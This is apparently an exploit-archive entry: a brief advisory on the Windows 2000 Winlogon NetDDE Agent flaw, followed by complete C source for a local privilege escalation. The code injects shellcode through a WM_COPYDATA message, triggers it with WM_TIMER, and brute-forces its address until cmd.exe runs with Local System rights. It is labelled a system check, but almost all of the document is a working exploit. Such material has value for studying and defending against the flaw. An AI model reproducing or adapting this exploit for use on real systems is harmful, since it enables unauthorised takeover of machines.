Microsoft Windows XP/2000/NT 4.0 - NetDDE Privilege Escalation (1)

// source: https://www.securityfocus.com/bid/5927/info

The Winlogon NetDDE Agent can be leveraged to allow local privilege escalation. This is related to the Microsoft Windows Window Message Subsystem Design Error Vulnerability (BID 5408). A local user can use a WM_COPYDATA message to send arbitrary code to NetDDE, which will be executed with Local System privileges when a second WM_TIMER message is sent.

//
/////////// Copyright Serus 2002////////////////
//mailto:[email protected]
//
//This program check system on winlogon bug present
//Only for Windows 2000
//This is for check use only!
//

#include <windows.h>
#include <stdio.h>


void main(int argc, char *argv[ ], char *envp[ ] )
{
	char	*buf;
	DWORD	Addr = 0;
	BOOL	bExec = TRUE;

	unsigned char sc[] = {	// my simple shellcode, it calls CreateProcess function,
							// executes cmd.exe on user`s desktop and creates mutex.
		0x8B, 0xF4,
		0x68, 0x53, 0x45, 0x52, 0x00,
		0x8B, 0xDC, 0x54, 0x6A, 0x00, 0x6A, 0x00,
		0xB8, 0xC8, 0xD7, 0xE8, 0x77, 0xFF, 0xD0, 0x8B, 0xE6,
	    0x6A, 0x00, 0x68, 0x2E, 0x65, 0x78, 0x65, 0x68, 0x00, 
		0x63, 0x6D, 0x64, 0x68, 0x61, 0x75, 0x6C, 0x74, 0x68, 0x5C, 0x44,
		0x65, 0x66, 0x68, 0x53, 0x74, 0x61, 0x30, 0x68, 0x00, 0x57, 0x69, 
		0x6E, 0x8B, 0xD4, 0x42, 0xB9, 0x50, 0x00, 0x00, 0x00, 0x6A, 0x00,  
		0xE2, 0xFC, 0x6A, 0x44, 0x83, 0xC4, 0x0C, 0x52, 0x83, 0xEC, 0x0C,
		0x8B, 0xC4, 0x83, 0xC0, 0x10, 0x50, 0x8B, 0xC4, 0x83, 0xC0, 0x08, 
		0x50, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00, 0x6A, 0x00,
		0x6A, 0x00, 0x83, 0xC2, 0x10, 0x52, 0x6A, 0x00, 0xB8, 0x4D, 0xA4,
		0xE9, 0x77, 0xFF, 0xD0, 0x8B, 0xE6, 0xC3
	};

	HWND			hWnd;
	COPYDATASTRUCT	cds;
	HMODULE			hMod;
	DWORD			ProcAddr;
	HANDLE			hMutex;
	char			mutname[4];

	printf("\n\n==== GetAd by Serus ([email protected]) ====");

	// Get NetDDE Window
	hWnd = FindWindow("NDDEAgnt","NetDDE Agent");
	if(hWnd == NULL) 
	{
		MessageBox(NULL, "Couldn't find NetDDE agent window", "Error", MB_OK | MB_ICONSTOP);
		return;
	}

	// Get CreateProcessA and CreateMutexA entry addresses
	hMod = GetModuleHandle("kernel32.dll");
	ProcAddr = (DWORD)GetProcAddress(hMod, "CreateProcessA");

	if(ProcAddr == 0)
	{
		MessageBox(NULL, "Couldn't get CreateProcessA address", "Error", MB_OK | MB_ICONSTOP);
		return;
	}
	*(DWORD *)(sc + 86 + 21) = ProcAddr;

	ProcAddr = (DWORD)GetProcAddress(hMod, "CreateMutexA");
	if(ProcAddr == 0)
	{
		MessageBox(NULL, "Couldn't get CreateProcessA address", "Error", MB_OK | MB_ICONSTOP);
		return;
	}
	*(DWORD *)(sc + 15) = ProcAddr;

	//Generate random Mutex name
	srand(GetTickCount());

	do
	{
		mutname[0] = 97 + rand()%25;
		mutname[1] = 65 + rand()%25;
		mutname[2] = 65 + rand()%25;
		mutname[3] = 0;
	}
	while((hMutex = OpenMutex(MUTEX_ALL_ACCESS, 0, mutname)) != 0);
	memcpy(sc + 3, mutname, 4);

	//Form buffer for SendMessage
	buf = (char *)malloc(1000);
	memset(buf, 0xC3, 1000);
	memcpy(buf, sc, sizeof(sc));

	cds.cbData = 1000;
	cds.dwData = 0;
	cds.lpData=(PVOID)buf;

	//If first login
	//Send shellcode buffer
	SendMessage(hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&cds);
	//Try execute it at 0x0080FA78
	PostMessage(hWnd, WM_TIMER, 1, (LPARAM)0x0080FA78);
	printf("\n\nTrying at 0x%X", 0x0080FA78);

	//If fails (perhaps not first login)
	//Try to bruteforce shellcode addresss
	for(Addr = 0x0120fa78; Addr < 0x10000000; Addr += 0x10000)
	{
		//If mutex exists, shellcode has been executed
		if((hMutex = OpenMutex(MUTEX_ALL_ACCESS, 0, mutname)) != 0)
		{
			//Success
			printf("\nSuccess!!!\n");
			printf("\nWarning! You system has vulnerability!\n");
			CloseHandle(hMutex);
			return;
		}
		printf("\rTrying at 0x%X", Addr);

		SendMessage(hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&cds);
		PostMessage(hWnd, WM_TIMER, 1, (LPARAM)Addr);
	}

	//Bug in winlogon not presents
	printf("\n\nBad luck! Reboot and try again.\n\n");

}